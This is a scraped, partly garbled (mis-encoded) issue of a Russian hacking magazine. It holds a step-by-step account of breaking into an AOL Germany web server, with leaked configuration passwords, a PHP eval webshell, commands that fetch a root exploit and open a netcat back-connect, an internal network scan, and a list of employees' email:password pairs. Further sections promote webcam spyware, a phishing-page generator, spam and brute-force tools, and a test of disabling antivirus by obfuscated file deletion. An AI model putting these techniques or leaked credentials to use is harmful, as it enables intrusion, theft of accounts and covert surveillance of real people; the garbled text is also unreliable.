ÍÎÊÀÓÒ ÄËß AOL Ïîëó÷àåì ïðèâèëåãèè ðóòà íà ñåðâåðå êîðïîðàöèè AOL Êîðïîðàöèÿ AOL âñåãäà ÿâëÿëàñü ëàêîìûì êóñî÷êîì äëÿ õàêåðîâ âñåõ âîçìîæíûõ ìàñòåé. Ñìîòðè ñàì: ìèëëèîíû çàðåãèñòðèðîâàííûõ ïîëüçîâàòåëåé â AIM. com. # 19 Info -> CorePlugin: TinyMCE TinyBrowser addon XÀÊÅÐ 10 /141/ 10 . я запустил его следующим образом: C:/Perl/bin/perl5.evip.255.12.

В верхушку указанного файла я вставил небольшую кавайную конструкцию: 067 . Содержимое архива с бэкапом var $secret = 'NAAgXewXco6BSw2d'. Пароль для юзера alex. что в нем находится полный бэкап нашего сайта :). Итак. 'wirwarendrin'. я стал терпеливо ждать. Work Method: Auto Switch (HEAD and GET). своего рода зеркало аоловского ресурса.lg'. .milw0rm. var var var var $smtpport $smtpuser $smtppass $smtphost = = = = '465'.de. скачав несколько самых больших словарей из топика http://forum./dnld.. var $db = 'test'.. . antichat. в том числе.aol.. опять же. Select starting options: Standard start point.aol.. wirwarendrin..2-english.com. multiple vulnerabilities Versions effected: Joomla! 1. 'smtp. var $password = 'wjedko. 'Briesben'. конечно же. чем я незамедлительно и занялся :). как оказалось. phpMyAdmin-3.tar. а также в alex. ÁÐÓÒÔÎÐÑ — ÁÛÑÒÐÎ È ËÅÃÊÎ! Моей любимой программой для брутфорса различных хешей является PasswordsPro.12 Check: /plugins/editors/tinymce/jscripts/tiny_mce/ plugins/tinybrowser/ Exploit: While Joomla! team announced only File Upload vulnerability. Скачав указанный архив.aol. подошел.de/administrator. поддерживает и формат шифрования паролей Joomla! — md5($pass. сам же файл шаблона лежал в /data/servers/wahl-o-mat_aol_de/pages/alex_aol_de/ templates/aol-exit/index.. See: http://www. я решил просканировать скрытые от посторонних глаз директории и файлы ресурса с помощью еще одного проекта OWASP — брутфорсера директорий DirBooster (ссылка. ÕÐÀÍÈÒÅ ÁÝÊÀÏÛ Â ÑÁÅÐÅÃÀÒÅËÜÍÎÉ ÊÀÑÑÅ! В архиве с бэкапом меня более всего заинтересовал файл конфига Джумлы configuration.com/exploits/9296 Vulnerable? Yes Ни одна из найденных «уязвимостей» ни на йоту не помогла мне приблизиться к заветной цели взлома.de находилась ссылка на wirwarendrin. на нем зарегистрировались и входили в курс дела около 450 бывших и настоящих сотрудников AOL.php. ресурс alex. содержащая в себе три файла (configuration. Из всех полученных результатов больше всего меня обрадовали следующие: . var $host = 'localhost'. Далее логичным показалось попробовать использовать логин и пароль от мускула в phpMyAdmin. in fact there are many. ÏÎÌÎÙÜ ÎÒ OWASP Осознав. var $user = 'alex'.. я вписал следующие настройки: Target URL: http://alex.de/.tar). в котором хранились следующие интересные вещи: <?php class JConfig { XÀÊÅÐ 09 /140/ 10 . падали регистрационные данные юзеров alex. Brute Force Files. находится в сносках). de. Название 80-метрового архива wirwarendrin. После нескольких часов брутфорса прога выдала мне пароль для данного хеша — qwertyzuaor. Number Of Threads: 200. я понял. в который. Я выбрал второй вариант.php. } ?> Первым делом я залез в почтовый ящик wirwarendrin@aol.aol./pma (phpMyAdmin) и директория .aol.tar меня обрадовало.3. Далее я попробовал по очереди брутфорс со всеми словарями.aol. Кстати. File extension: php. входящими в комплект поставки проги.. . Запустив программу.com'. которая.. так что для дальнейшей заливки шелла оставалось два варианта: добавить нового админа в Джумлу или сбрутить пароль существующего админа. так как на главной странице alex. так что далее я незамедлительно принялся заливать шелл с помощью правки шаблонов Джумлы :) AOL INSIDE Шаблон для правки находился в админке по следующему пути: «Extensions Æ Template Manager Æ aol-exit Æ Edit HTML»..php?t=13640 и зарядив их в PasswordsPro на предмет брута соленого админского хеша d86f4c81342b79c4bab8868656c abe46:t65HKT9iuoOUdvfIAD0JP0ynT6EpRHXb. что через Джумлу мне вряд ли удастся проникнуть на нужный сервер.Привилегии рута получены! .$salt).php./info.aol.ru/showthread.de создавался одним из работников AOL для координации проведения вечеринки среди сотрудников германского отделения корпорации. с которым я успешно и залогинился в alex.php (phpinfo). Brute Force Dirs. как оказалось.de.5. .

Not shown: 971 closed ports PORT STATE SERVICE 22/tcp open ssh 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 1024/tcp open kdm 1025/tcp open NFS-or-IIS 1027/tcp open IIS 1078/tcp open unknown 1112/tcp open msql XÀÊÅÐ 10 /141/ 10 .aol.uk.62.62.0/24 Сейчас я не буду рассказывать о своих дальнейших действиях с сеткой немецкого AOL.aol.co.html) в ту же директорию templates под именем 404.exe -l -p 31337 Получив искомое.de: editor. предварительно запаковав весь стафф с помощью следующей команды: cd /data/servers.de.62..134.pl за работой сети наш сервак скрывается под адресом 10.tgz). опять же. Так что дальше с помощью rpm я скачал и установил nmap: rpm -vhU http://nmap. Далее.134.00013s latency).rpm и запустил его следующим образом: nmap -v -n -sS 10.de.aol.tgz. я и получил заветное «uid=0(root) gid=0(root) groups=11560(httpd)»: wget http://www.fr.i386.grsecurity.ВЗЛОМ Таблица с юзерами Joomla! <?php eval(stripslashes($_REQUEST[aaa])).tar xzfv wunderbar_emporium. благо. немецкий «wunderbar emporium» (http://www.php и смог с удобством просматривать все файлы и директории (кстати.89 Host is up (0./* Следующей целью./*.9-55. что абсолютно все файлы и директории были открыты на запись).de 2..80.net/~spender/wunderbar_ emporium.aol.de/templates/aol-exit/ index.ru/thread103155.6.tgz .62.tar czvf /tmp/1. после выполнения нехитрой последовательности команд.com.antichat. wahl-o-mat.grsecurity.tgz./wunderbar_emporium. я принялся за поиски нужного рутового сплоита на http://www. sns. Таковым оказался. было получение рута на данном сервере.php" method="POST"> <input type="text" name="aaa"/> <input type="submit" value="Pwn It!"/> </form> Первым делом с помощью утилиты wget я залил на сервер WSO-шелл (http://forum.. а покажу лишь парочку самых интересных отчетов сканера: Nmap scan report for 10. которую я себе поставил.aol.exploit-db. старое и унылое ядро это позволяло: Linux wahl-o-mat.com.134. получить который мне помог банальный перловый Back-connect к 31337 порту моего дедика в WSO (раздел Network) и ставший притчей во языцех NetCat: c:/netcat/nc.00013s latency). gat. Nmap scan report for 10. matrix.chmod 0777 .nexus. а попросту слил все исходники на винт своего дедика. Для этого я выполнил команду ifconfig и узнал.ELsmp #1 SMP Fri Apr 20 17:03:35 EDT 2007 i686 Для начала мне был необходим интерактивный шелл.sh ÈÍÒÅÐÅÑÍÎÅ После получения привилегий рута мне почему-то захотелось просканить внутреннюю сетку.aol.aol. еще один косяк админа заключался в том.96 Host is up (0.21-1.org/dist/nmap-5. ÅÙÅ ÃËÓÁÆÅ! В директории /data/servers сразу же можно было посмотреть на сайтысоседи нашего alex.134.net/~spender/wunderbar_ emporium. ?> Далее к этому делу оставалось набросать небольшой HTML-клиент: <form action="http://alex. Not shown: 986 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 135/tcp open msrpc 445/tcp open microsoft-ds 1024/tcp open kdm 1041/tcp open unknown 1051/tcp open optima-vnet 1311/tcp open rxmon 1801/tcp open unknown 2099/tcp open unknown 2103/tcp open zephyr-clt 2105/tcp open eklogin 2107/tcp open unknown 3389/tcp open ms-term-serv MAC Address: 00:18:8B:74:52:6E (Dell) .aol. Сильно разбираться с их строением и значением я не стал. что в 068 joomscan.

322.com:hanne Pierre PierreBeneHH@aol.net/lab/ pr0js/files.!z 069 . В указанных почтовых ящиках находилось очень много забавных документов: внутренние аоловские расписки.php/joomscan. Но одним админом я не ограничился. а зарядил на брут и остальные 450 аккаунтов. XÀÊÅÐ 10 /141/ 10 com:wasistdas KrassowskiSabine@aol.de:sommer07 tringasvassiliki tringasvassiliki@aol. старое ядро. из которых успешно сбрутились 197.de. который произошел из-за банальной безалаберности и невнимательности админа.com:Delphines fkorupp frederickorupp@googlemail.081 Как видно.pl — Joomla! Security/Vulnerability Scanner •http://www.shtml — PasswordsPro •http://www. Allow Deny from all HTTP://WWW links •http://yehg. Вот лишь часть одного из внутренних документов с пометкой «Company Confidential». телефоны. PasswordsPro помог мне расшифровать хеш пароля админа alex. резюме работников. доступность phpMyAdmin'а для внешних пользователей.com:derwis JennySefkow JennySefkow@aol. com:brauere Jennifer2706 jennifermatheja@aol./dnld backconnect в WSO-шелле 1311/tcp open rxmon 1801/tcp open unknown 2099/tcp open unknown 2103/tcp open zephyr-clt 2105/tcp open eklogin 2107/tcp open unknown 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 3389/tcp open ms-term-serv 9998/tcp open unknown 13722/tcp open netbackup 13782/tcp open netbackup 13783/tcp open netbackup 49152/tcp open unknown 49153/tcp open unknown MAC Address: 00:13:72:5A:3E:78 (Dell) Как видишь.V.de:hochzeis Trixi seebertrixi@aol.de KrassowskiSabine@ aol. фотографии офисов. voigthh@googlemail.ru/download/? case=info&go= 100 — NetCat На твоих глазах развилась очередная история взлома одного из сайтов крупной компании. открытость файлов и директорий на запись и предсказуемые пароли.com:varita NinaRixenHH@aol. ÍÀÏÎÑËÅÄÎÊ Чтобы защитить внутренние директории твоего сайта от любопытных глаз.webhack. de:perikle AgnesAB agnesboltzenhh@aol.htaccess с одной единственной строчкой — Options +Indexes.com NinaRixenHH@aol. AOL Germany SNAPSHOT SUMMARY as of COB Date : [2006-02-11] Business : AOL GERMANY (AOL) FOR [2006-02-11] -Ending Members 2. А чтобы защитить вообще все файлы такой директории от доступа извне.com:keiness thomaskuck thomaskuck@aol.php/ Category:OWASP_ DirBuster_Project — OWASP DirBuster Project •http://www. Вот некоторые интересные работоспособные аккаунты: guenterstaar guenterstaar@aol.aol. в этой статистике содержится полная инфа по внутреннему юзерообороту немецкого отделения корпорации за 2006-02-11 :). Здесь я могу отметить несколько основополагающих факторов: хранение бэкапа в общедоступном месте.INFO info Админка Джумлы Содержимое директории . insidepro. org/index.com:wombast Tenge Tenge@aol.173 -Registrations 1. пароли к ebay и paypal (!).472 -Terminations 549 -Net Change -50 -Customer Hours 7.com/eng/ passwordspro. AOL CONFIDENTIAL Закончим на сегодня с многострадальной внутренней сеткой AOL и продолжим с вытащенными мной из базы данных Джумлы логинами и хешами работников корпорации.aus H.824 -Reactivations 146 -Overhead Conversions 1 -Cancellations 1.301. советую в чувствительные директории кинуть . пропиши еще и вот это: Order Deny. Надеюсь. Далее я стал потихоньку проверять полученные пароли на предмет их подходимости к почте аоловцев. статистика и многое другое. после прочтения сего опуса ты никогда не повторишь глупейших ошибок работников AOL :). com:Silvera bettyvonloesch bettyvonloesch@aol.com:sascha mdfreedom99 marcdrewello@aol. пароли просто поражают своей простотой :).de:April2008 Как видишь.owasp.418 -Total Hours 7.com:Magic23 ClaudiaLangwald ClaudiaLangwald@aol. в AOL очень любят продукцию мелкомягкой компании :).687. Как я уже писал выше.de:Sommer44 neddie annettharksenhh@aol. адреса.com:elite15 A.

. NV12. Забудь о всяческих кейлоггерах.html.ëîã ðàáîòû. который ты тоже сможешь найти на нашем диске. . . I420. YUY2. . òî ïèøåì ïðîñòî «/ adminka/». ÷àñòîòà äèñêðåòèçàöèè). Socks5.Ñèñòåìà «êëèåíò-ñåðâåð». сниферах и иже с ними. . . Y8. Все ссылки на странице меняются на ссылки самого фейкогенератора. Если же пользователь ничего не введет. Скачивается страница. Для работы с генератором тебе понадобится следующий инструментарий: PHP.php. Программа: VK Regger ОС: Windows 2000/XP/2003 Server/ Vista/2008 Server/7 Автор: 0pTik А вот и ожидаемая многими тулза — реггер аккаунтов ВКонтакте от мембера Античата. òî ïèøåì «/»). . ru/adminka/. 2.ìíîãîïîòî÷íîñòü (äî 10 ïîòîêîâ â ïàáëèê-âåðñèè).antichat. 3.Êîäèðîâàíèå àóäèîïîòîêà â IMA ADPCM.îáõîä êàï÷è ñ ïîìîùüþ ñåðâèñà antigate. Настройки выглядят следующим образом: Fake host — ïîääåëûâàåìûé õîñò (åñëè ìû îáìàíûâàåì àâòîðèçàöèþ íà http:// www. что во встроенном функционале реггера отсутствует возможность подтверждения свежезареганных аккаунтов по мылу.ru. YUV. «последить» здесь указано в прямом значении этого слова. File — îòñíèôàííûå äàííûå ïèøóòñÿ â óêàçàííûé ôàéë.ВЗЛОМ Маг icq 884888 X-TOOLS ПРОГРАММЫ ДЛЯ ХАКЕРОВ Программа: RemCam 2 ОС:Windows 2000/XP/2003 Server/ Vista/2008 Server/7 Автор: redsh Описание: .ru/ showthread. . òî ïèøåì òîëüêî «mail.Àâòîìàòè÷åñêàÿ áàëàíñèðîâêà àóäèî è âèäåîïîòîêîâ ïðè íåõâàòêå ïðîïóñêíîé ñïîñîáíîñòè êàíàëà. Log type — òèï îïîâåùåíèÿ (mail èëè file). Программа: aNYfAKE ОС: *nix/win Автор: b00zy_c0d3r and The Mafia А вот и очередной генератор фейков. XÀÊÅÐ 10 /141/ 10 . . 070 Кстати.ïîääåðæêà HTTP Proxy.ru/adminka/ loginhere.âñòàâêà âûáðàííûõ àâàòàð. ru»). ибо я представляю твоему вниманию замечательную прогу — RemCam 2. Если у тебя есть любые вопросы по работе генератора.Îïöèîíàëüíàÿ çàùèòà ñåðâåðà ïàðîëåì (ïðîñòàÿ md5-àóòåíòèôèêàöèÿ ñ ñîëüþ).Àäðåñíàÿ êíèãà äëÿ ñåðâåðîâ ñ âîçìîæíîñòüþ èìïîðòà è ýêñïîðòà. Для начала работы тебе необходимо настроить скрипт и залить сгенерированный им файл на любой подходящий хост. è äðóãèå).Äëÿ äåêîäèðîâàíèÿ ëþáûõ ôîðìàòîâ íå òðåáóåòñÿ óñòàíàâëèâàòü êàêèå-ëèáî äîïîëíèòåëüíûå êîäåêè.çàïîëíåíèå ñòðàíèö íà 98%.ôîðìàòîâ (BI_RGB. ru/thread219834. óêàçàííîå â ýòîì ïàðàìåòðå. YV12. . которая с легкостью сможет следить за любыми удаленными аудио/видео-устройствами! Зацени возможности данной утилиты: . Оптика. fopen.xeka. .ñëó÷àéíûé âûáîð èìåí è ôàìèëèé èç ñîîòâåòñòâóþùèõ ñïèñêîâ.php»). Socks4.Ïîääåðæêà ðàñïðîñòðàíåííûõ RGB. Все вопросы и пожелания по работе программы оставляй тут: http://forum.mail. Принцип работы скрипта достаточно прост: 1. . Fake path — ïóòü ê ïîääåëûâàåìîé ñòðàíèöå (åñëè èìååòñÿ ñòðàíè- öà àâòîðèçàöèè http://somesite. указанная в настройках. .ðàíäîìíûé ïàðîëü èëè ïàðîëü èç ñïèñêà. JPEG . Также стоит отметить. Email — îòñíèôàííûå äàííûå øëþòñÿ íà ìûëî. Грабим удаленное видео Тебе никогда не хотелось последить за своими соседями по локалке? Причем. php?feed=programs&id=20 (также здесь находится и видео с подробнейшим мануалом по захвату любой аудиовизуальной информации с помощью RemCam 2). 5. . .Ñæàòèå âèäåîïîòîêà â JPEG ñ íàñòðàèâàåìîé ñòåïåíüþ êâàíòîâàíèÿ. ðàçðåøåíèå). . 4. Fake script — àäðåñ ïîääåëûâàåìîãî ñêðèïòà (åñëè èìååòñÿ ñòðàíèöà àâòîðèçàöèè http://somesite. UYVY.Ìàëåíüêèé ðàçìåð ïðèëîæåíèÿ (ñåðâåð — 180.Âûáîð ôîðìàòà çàõâàòà è ïåðåäà÷è àóäèî (êîëè÷åñòâî êàíàëîâ. MJPG. работающие сокеты и красивый домен.Âûáîð ôîðìàòà âèäåîçàõâàòà (âèäåîôîðìàò. который не будет бросаться в глаза :). Redirect — ñòðàíèöà.Èíäèêàòîðû èñïîëüçîâàíèÿ òðàôèêà è çàãðóçêè ïðîöåññîðà íà ëîêàëüíîé è óäàëåííîé ñèñòåìå.Îïöèîíàëüíîå ZLIB-ñæàòèå òðàôèêà. Меняется адрес обработчика форм. прога предоставляется автором с полностью открытыми исходниками. то его снова перебросит на страницу фейка. но автор с радостью предоставляет тебе другую утилиту специально для этой цели — многопоточный «Подтверждатель аккаунтов для ВК». упрощающий процесс фишинга и троллинга юзера ушастого. Возможности проги: . .5 Êá). òî ïèøåì «loginhere. íà êîòîðóþ áóäåò ïåðåìåùåí þçåð ïîñëå ââîäà äàííûõ.php?t=142. à åñëè ñòðàíèöà íàõîäèòñÿ â êîðíå. .ru/board. смело направляй их прямиком автору скрипта в топик — http://forum. Снифер снифает все введенные пользователем данные и перенаправляет его на указанный тобой адрес. которые ты сможешь найти по адресу redsh.

ëîã ñ àâòîî÷èñòêîé. то помни — мы против спама! Программа: ASR Brute ОС: Windows 2000/XP/2003 Server/ Vista/2008 Server/7 Автор: q1w2e3 Брутер секретных ответов на Рамблере На очереди еще одна замечательная программа от q1w2e3. .S. . . Так что.NET Framework 3. Windows 7 Maximum. Ищем текст в тысячах файлов Давненько на страницах нашей рубрики не появлялись релизы от команды webxakep.ðàáîòàòü áåç ïðîêñåé. P. а что с ними можно делать дальше? Для работы со списками таких акков существует целая туча специализированного софта (многие программы не раз описывались на страницах нашей рубрики). . Возможности и особенности спамера: XÀÊÅÐ 10 /141/ 10 ICQ-спамер в действии . если среди огромного количества текстовиков тебе понадобилось найти мыло/ пароль/асю/номер телефона и иже с ними.îáðàáîòêà áîëüøèõ ôàéëîâ (îò 1 Ãá). . . . ввести капчу (вводится один раз) и нажать на кнопку «Start». . .ìàëàÿ íàãðóçêà íà ïðîöåññîð (ïðè îáðàáîòêå 30000 ôàéëîâ íàãðóçêà ñîñòàâëÿåò æàëêèå 15-20%).txt. .txt.S.áðàòü ñëîâà äëÿ áðóòà èç ñëîâàðÿ dict. Итак. выбрать домен. .ïîèñê ìîæíî âåñòè êàê ïî âñåì ôàéëàì. .îòîáðàæåíèå èíôîðìàöèè ïî çàãðóæåííûì è âûâåäåííûì â îíëàéí íîìåðàì. . ICQ Light Spam — это программа для рассылки спам-сообщений по ICQ.ñ÷åò÷èê îòïðàâëåííûõ ñîîáùåíèé è îøèáîê îòïðàâêè.âîçìîæíîñòü çàãðóçêè ñðàçó íåñêîëüêèõ óèíîâ äëÿ ñïàìà. Для начала процесса перебора тебе всего лишь необходимо сохранить свой словарь в dict. данная утилита служит для добавления в твой аккаунт бесконечного количества поклонников и обладает следующим функционалом и особенностями: .ïðîãðàììó íå íàäî óñòàíàâëèâàòü (èçíà÷àëüíî èäåò âñåãî ëèøü îäèí ôàéë).óäîáíûå íàñòðîéêè. . что рейтинг на аккаунте. .ìàëîå ïîòðåáëåíèå ÎÇÓ (ïðè îáðàáîòêå 30000 ôàéëîâ ïîòðåáëåíèå ÎÇÓ íàõîäèòñÿ â ïðåäåëàõ 14 Ìá). .3 ОС: Windows 2000/XP/2003 Server/ Vista/2008 Server/7 Автор: IOFFE Добавляем поклонников ВКонтакте Вот нарегал ты несколько десятков тысяч аккаунтов ВКонтакте.ðàáîòàåò íà . .ïðîãðåññáàð. который был привязан к Рамблеру?). P.запустить прогу.txt.php?t=7693. .ïðè âûâîäå ðåçóëüòàòà ñðàçó æå ïîäñâå÷èâàåòñÿ êóñîê ñòðîêè.íå ïðîïóñêàòü «ãóäû». .5. . благодаря которым к тебе в шоху ломится куча номеров с предложениями что-то купить и на что-то нажать :) Как видно из названия. . Все вопросы по работе тулзы советую постить в топик http://webxakep. . ASR Brute (Answer Secret Rambler Brute) — это брутер секретных ответов на Rambler. .ïîääåðæêà antigate è ðó÷íîãî ââîäà êàï÷è.óíèêàëüíàÿ âîçìîæíîñòü ïðîñìîòðà ôðàãìåíòà òåêñòà.antichat.ãàðàíòèðîâàííàÿ ðàáîòà íà Windows 7 Ultimate. . ввести логин жертвы.z 071 . .ñîõðàíÿòü íåïðàâèëüíûå îòâåòû â bad.àêêè çàíîñÿòñÿ â ñïèñîê â âèäå mail:password. Windows Vista è Windows XP.net/forum/ showthread.óäàëåíèå ïîêëîííèêîâ.ìíîãîïîòî÷íîñòü + àâòîâûáîð ïîòîêîâ (îò 1 äî 100).îáðàáîòêà ëþáîãî êîëè÷åñòâà ôàéëîâ. òàê è ïî îäíîìó èëè ãðóïïå òèïîâ. посвященная аськам и мыльникам.ru (вдруг тебе понадобится снять красивый номер аськи. Прими во внимание. Программа: ICQ Light Spam ОС: Windows 2000/XP/2003 Server/ Vista/2008 Server/7 Автор: q1w2e3 Исключительно ради образовательных целей представляю твоему вниманию один из многочисленных ICQ-спамеров. .îòêðûòèå ôàéëîâ èëè ïàïîê ïðÿìî èç ãëàâíîãî îêíà ïðîãðàììû.îòîáðàæåíèå ñêîðîñòè îòïðàâêè ñîîáùåíèé â ñåêóíäàõ.ru/ threadnav207277-1-10.txt. â êîòîðîì íàéäåíî ñëîâî (òî åñòü íå íàäî áóäåò êàæäûé ðàç îòêðûâàòü îäèí è òîò æå ôàéë).html.ñêîðîñòü ïåðåáîðà çàâèñèò îò ñêîðîñòè èíòåðíåòà (äî 50 ñåêðåòíûõ îòâåòîâ â ñåêóíäó íà 10 Ìáèò).ìàêñèìàëüíîå êîëè÷åñòâî ñèìâîëîâ â ñîîáùåíèè — 4000. .îíà ìíîãîïîòî÷íà.ïîäðîáíàÿ ñòàòèñòèêà. Вот что умеет данная утилита: . . то лучшим решением будет использование ArxFinder. Итак. . VkFunAdder как раз и является одной из таких программ.ðàññûëêà ñîîáùåíèé ïî âûáðàííîìó äèàïàçîíó. â êîòîðîì íàéäåíî èñêîìîå ñëîâî. . Если ты все же собрался использовать прогу по ее прямому назначению. должен быть более 200 единиц.âîçìîæåí ïîèñê ïî ðåãóëÿðíûì âûðàæåíèÿì.êíîïêè «Ñòàðò» è «Ñòîï». к которому ты хочешь добавить поклонников. . Автор с радостью выслушает твои отзывы о работе проги здесь: http://forum.àíòèáàí. .î÷åíü âûñîêàÿ ñêîðîñòü ðàáîòû.net.ñîõðàíÿòü ïîäîáðàííûé îòâåò â good. Особенности программы: . Удачного брута! :) Программа: ArxFinder ОС: Windows 2000/XP/2003 Server/ Vista/2008 Server/7 Автор: ArxWolf Реггер аккаунтов ВКонтакте за работой Программа: VkFunAdder 0. поэтому спешу представить прогу ArxFinder — уникальный инструмент для поиска текста в любом количестве файлов.

Как понятно из его названия.MALWARE deeonis deeonis@gmail. постоянно и быстро защищающая компьютер от такого вредоносного ПО. Хотя о чем речь? Какие правила? Какие вообще могут быть правила на войне — войне вирусов и антивирусов? Кто сильнее — тот и прав. нам пр осто нравится все ломать :). благодаря чему снискала большую 072 популярность во всем мире. делать все по-умному и по правилам. трояны. К достоинствам данного продукта можно отнести наличие проактивной защиты. Backdoor-программы. который подвергнется нашим краш-тестам. Первый претендент — это антивирус ESET NOD32 версии 4. Со слов рекламщиков — это надежная бесплатная антивирусная программа. черви. червей. которые сами разработчики называют «щитами» (щит поведения. ÏÐÈÍÖÈÏ ÒÅÑÒÈÐÎÂÀÍÈß Для вновь присоединившихся напомним. мистификаторы. троянских программ. Сегодня в нашу краш-лабораторию попали три популярных антивирусных программы. Все опыты проводились в Windows XP Professional SP3. что и каким образом мы тестируем. И мы их придерживаемся. другие можно выполнить вручную с помощью стандартных инструментов Windows. HIPS (Host Intrusion Prevention System) и высокую скорость работы. Он представляет собой решение для защиты домашнего компьютера от вирусов. Avira: ïðîâåðèì èõ íà ñòðåññîóñòîé÷èâîñòü Вообще-то мы могли бы читать толстые талмуды про методики тестирования антивирусов. И. шпионских программ.п. Теперь немного о самих тестах. В роли следующего подопытного выступает avast! Free Antivirus.д. Кроме того. кто оказался самым стойким.2. наконец. точное обнаружение угроз. рекламного ПО. будет Avira AntiVir Personal. то и испытаXÀÊÅÐ 10 /141/ 10 . За прохождение каждого теста выставляется оценка по пятибальной шкале. нами были разработаны пять ужасных испытаний. фишинг-атак и руткитов. Avast.com ÊÐÀØ-ÒÅÑÒ ÀÍÒÈÂÈÐÓÑÎÂ: òðîéíàÿ ïåíåòðàöèÿ Nod32. вот и все правила. как вирусы. программа совершенно бесплатна. В конце мы подсчитаем среднеарифметическое всех оценок и посмотрим. Основными ее достоинствами являются защита от руткитов в реальном времени. Так как мы проводим краш-тестирование. третьим (и последним) антивирусом. а также разнообразные модули защиты. технология avast! Intelligent Scanner. диалеры и т. щит P2P/мгновенных сообщений и т. Некоторые тесты представляют собой специально написанные мной программы.). Итак.

2 Ñðàâíèòåëüíàÿ òàáëèöà ðåçóëüòàòîâ 073 . никаких намеков на сбой в работе. никаких специальных утилит мы писать не будем. Мы используем специальный трюк. Этот трюк был хорошо описан в прошлой статье. но с одним-единственным отличием — путь к удаляемому файлу мы передаем в зашифрованном виде. Третий тест опять-таки удаляет жизненно важные файлы. указав нужные файлы и перезагружаем компьютер. а второй — с привилегиями системы.Ïîëüçîâàòåëüñêèé èíòåðôåéñ NOD32. который не может быть проанализирован эвристическими движками. делаем ребут и. avguard. Теперь посмотрим. то оно честно заслужило как минимум тройку. Это отвратительно. К сожалению. к сожалению. Запускаем утилиту для удаления. то можно увидеть два процесса: egui.exe. причем на пять. Если запустить NOD32 и посмотреть в диспетчер задач. как первокурсники перед экзаменом. а удалить во время загрузки ОС с помощью специальной API-функции.. и они выдержали это нападение. Никаких лишних сообщений. предварительно зашифровав их полные имена.exe. Первый запущен с правами текущего пользователя. Если в результате выполнения того или иного теста защитные функции наших «лабораторных образцов» перестали работать. путь к которому должен быть прописан в первом параметре нашей чудо-функции. как все это переживут наши антивирусы. оба антивируса как новенькие. Основная их цель — вывести из строя антивирусное ПО как можно более незаметно для пользователя. но при этом хитро шифровать имя удаляемого файла.exe. Тест пройден. который хотим удалить при следующей загрузке ОС. Первый тест будет тупо пытаться удалить самые важные бинарные файлы дистрибутива антивируса. и авира справились на пятерку. Разумеется.exe и ekrn. что его осилит даже самый нерадивый хакер. ÒÅÑÒ ¹2 Второй краш-тест практически полностью повторяет первый. чтобы обмануть эвристики испытуемых антивирусов. ÒÅÑÒ ¹3 Третье испытание также будет удалять нужные для антивирусного ПО файлы. В противном случае мы будем смотреть. поэтому возвращаться к нему мы сейчас не будем. Для этого при вызове функции MoveFileEx мы будем маскировать флаг ESET NOD32 Òåñò ¹1 Òåñò ¹2 Òåñò ¹3 Òåñò ¹4 Òåñò ¹5 Òåñò ¹6 Ñðåäíèé áàëë 5 5 5 3 2 3 3. то антивирь получает жирную двойку.exe. Второй будет делать то же самое. маскируя вызов смертоносной API-функции под совершенно безобидный код. avshadow. Все справились на «отлично». приступим к самому интересному. но при этом скрывает этот факт. И еще несколько слов о каждом испытании в отдельности. краш-тесты готовы к запуску.8 avast! Free Antivirus 5 5 5 3 5 5 4.exe и avasrui. заставляющих пользователя делать выбор.. когда все нюансы оговорены. будет безвозвратно удален после перезагрузки ОС. После перезагрузки антивирус успешно запустился. что и в первом тесте. что основан он на алгоритме генерации ключа криптования. XÀÊÅÐ 10 /141/ 10 Avira â äåéñòâèè Но у нас осталось еще два претендента на звание самого стойкого. один из тестов будет запрещать запуск антивируса по средствам политик безопасности. И аваст. Атаковать мы будем все те же файлы. Но не просто удалить.. то файл. Если в качестве второго параметра передать NULL. Процедура шифрования тоже не совсем простая. NOD32 опять героически выдерживает нападение на свои exe’шники. Îáíîâëÿåì áàçû ñèãíàòóð ния у нас будут соответствующие. Вот их-то мы и попытаемся удалить. а антивирусы трясутся от страха. Программа вызовет системную функцию MoveFileEx. А вот avast! Free Antivirus и Avira AntiVir Personal. при желании все это дело можно реализовать программно.7 Avira AntiVir Personal 5 5 5 3 4 3 4. Всем пятерки. эта функция может перемещать файлы и папки. как ПО справилось с проблемой. поскольку выполняться они будут с помощью стандартных средств ОС Windows.exe. поскольку NOD32 тихо и спокойно предотвратил попытку собственного удаления с жесткого диска пользовательской машины. В командной строке мы передадим ей полное имя файла. ÒÅÑÒ ¹1 Первый тест будет проделан средствами специально написанной утилиты. что его хотят стереть с родного жесткого диска. Если появилось хоть какое-нибудь сообщение перед смертью. Приступим к испытанию. Ну а теперь. а третьим — флаг MOVEFILE_DELAY_UNTIL_REBOOT. Запускаем тест. Итак. а второй попробует деинсталлировать ПО без лишнего шума и пыли. но при этом будет маскировать сам факт попытки удаления. Четвертое и пятое испытания стоят особняком. Код программы настолько прост. чтобы антивирь не догадался. В случае с avast мы будем атаковать файлы avastsvc.. После перезагрузки он все так же радует нас своей замечательной иконкой в трее. а с Avira AntiVir — avgnt. Скажу лишь.

удаляются ли нужные файлы и ключи реестра. наша краш-лаборатория медленно. А теперь смотрим на ситуацию сверху — что можно увидеть? Везде стоят вирусы. Это просто бизнес. и не видно никаких окон. который красноречиво заявляет о наших намерениях. И вот уже радостное «Welcome» на приятном синем фоне сообщает нам о том. и avast!. возможно. как и NOD — запустилась только системная служба. Всем по трояку.5k экземпляров одного и того же вируса. если честно. Для этого в главном меню системы нужно выбрать пункт «Выполнить. что через несколько секунд мы узнаем о том. То. В третий раз проделывая уже хорошо знакомые нам операции.» и вписать туда следующее: gpedit. А с ним ничего и не произошло. Неужели все опять заработали по пять баллов и мы никому не влепим даже жалкой троечки. где я работаю. так и чувствуют. Недалеко ушел и Avira AntiVir.MALWARE À âîò è çàùèòà avast! îò íåñàíêöèîíèðîâàííîãî óäàëåíèÿ Óñòàíîâêà Avira AntiVir Personal MOVEFILE_DELAY_UNTIL_REBOOT. и Avira. Подождем еще минутку. по которой за первые три теста все антивирусы получили по пятерке. После чего справа мы увидим «Don't run specified Windows applications». это просто тормоза. которые должны быть стерты с поверхности диска. на которой оказалось чуть больше 1. ту организацию.. Работает. Хотя. ðåäàêòîð ðóáðèêè «Malware» Ну. а точнее — шифрование этого параметра. И что? Да у нас тут прямо вирусный зоопарк. Одно радует — впереди еще есть тесты. В политиках винды мы пропишем два исполняемых файла: egui. почти везде стоят аверы. Побежала строка загрузки старой доброй Windows Ïî÷åìó âñå òàê õîðîøî ñïðàâèëèñü? Основная причина. Драйвер слежения за реестром просто 